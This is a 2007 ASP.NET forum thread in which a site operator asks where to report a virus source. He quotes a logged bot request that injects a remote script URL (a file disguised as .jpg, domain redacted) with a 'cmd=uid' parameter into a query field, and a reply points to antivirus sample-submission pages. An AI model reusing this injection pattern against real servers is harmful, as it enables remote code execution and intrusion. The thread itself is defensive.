OT: Where to Report Source of Virus?

Discussion in 'ASP .Net' started by Smithers, Aug 14, 2007.

  1. Smithers

    Smithers Guest

    My question: is there some sort of authority I can report this to? If so,
    who? I have a URL directly to a virus-infected file that's getting spread
    around on the Internet.

    My situation is this: I have a Web server (hosted at a commercial data
    center) that faces the public Internet. One of my customer's Web sites has
    recently been the subject of some sort of attack - I'm not sure how to
    categorize it. The attacker (apparently a spider named lwp-trivial)
    substitutes a URL to an otherwise valid query string, then submits the
    request. The following is from my centralized error logging routine that
    logs all exceptions not otherwise handled:

    <RawURL>/udp/UDP_01.aspx?memberID=http://www.DOMAINNAME/smarty/templates/manager/.xpl/FILENAME.jpg?&amp;amp;cmd=uid</RawURL>
    <UserAgent>lwp-trivial/1.40</UserAgent>

    NOTE: Everything in the RawURL is legitimate up to and including "memberID="
    After that, it's whatever the bot substituted in place of legit values.

    I have changed the real domain name and file name in the above request for
    purposes of posting here.

    I entered the above bot-injected URL directly into my browser and
    immediately Norton AV detected a virus.

    Thanks.
     
    Smithers, Aug 14, 2007
    #1
    1. Advertising

  2. Smithers

    Teemu Keiski Guest

    Re: Where to Report Source of Virus?

    Virus Scanner tool providers such as F-Secure or Symantec are such
    authorities. For example:
    http://www.f-secure.com/security_center/sample_submit.html

    However, If their products already detect the virus, I think there's no need
    to inform them. There are also secuity etc related email lists etc where you
    can spread information.

    --
    Teemu Keiski
    AspInsider, ASP.NET MVP
    http://blogs.aspadvice.com/joteke
    http://teemukeiski.net


    "Smithers" <> wrote in message
    news:...
    > My question: is there some sort of authority I can report this to? If so,
    > who? I have a URL directly to a virus-infected file that's getting spread
    > around on the Internet.
    >
    > My situation is this: I have a Web server (hosted at a commercial data
    > center) that faces the public Internet. One of my customer's Web sites has
    > recently been the subject of some sort of attack - I'm not sure how to
    > categorize it. The attacker (apparently a spider named lwp-trivial)
    > substitutes a URL to an otherwise valid query string, then submits the
    > request. The following is from my centralized error logging routine that
    > logs all exceptions not otherwise handled:
    >
    > <RawURL>/udp/UDP_01.aspx?memberID=http://www.DOMAINNAME/smarty/templates/manager/.xpl/FILENAME.jpg?&amp;amp;cmd=uid</RawURL>
    > <UserAgent>lwp-trivial/1.40</UserAgent>
    >
    > NOTE: Everything in the RawURL is legitimate up to and including
    > "memberID=" After that, it's whatever the bot substituted in place of
    > legit values.
    >
    > I have changed the real domain name and file name in the above request for
    > purposes of posting here.
    >
    > I entered the above bot-injected URL directly into my browser and
    > immediately Norton AV detected a virus.
    >
    > Thanks.
    >
     
    Teemu Keiski, Aug 14, 2007
    #2
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Meheraj shaik via .NET 247

    Crysatl report load report failed

    Meheraj shaik via .NET 247, May 28, 2005, in forum: ASP .Net
    Replies:
    1
    Views:
    3,253
    saapr
    Jun 7, 2005
  2. James Wallace
    Replies:
    0
    Views:
    1,062
    James Wallace
    Oct 17, 2003
  3. Urza9814

    "virus" (NOT an actual virus)

    Urza9814, Sep 24, 2003, in forum: C++
    Replies:
    6
    Views:
    545
    Urza9814
    Oct 11, 2003
  4. Anthra Norell
    Replies:
    0
    Views:
    532
    Anthra Norell
    Mar 9, 2005
  5. Aaron Bertrand - MVP

    Virus alert (no, this is not a virus)

    Aaron Bertrand - MVP, Jan 27, 2004, in forum: ASP General
    Replies:
    0
    Views:
    201
    Aaron Bertrand - MVP
    Jan 27, 2004
Loading...

Share This Page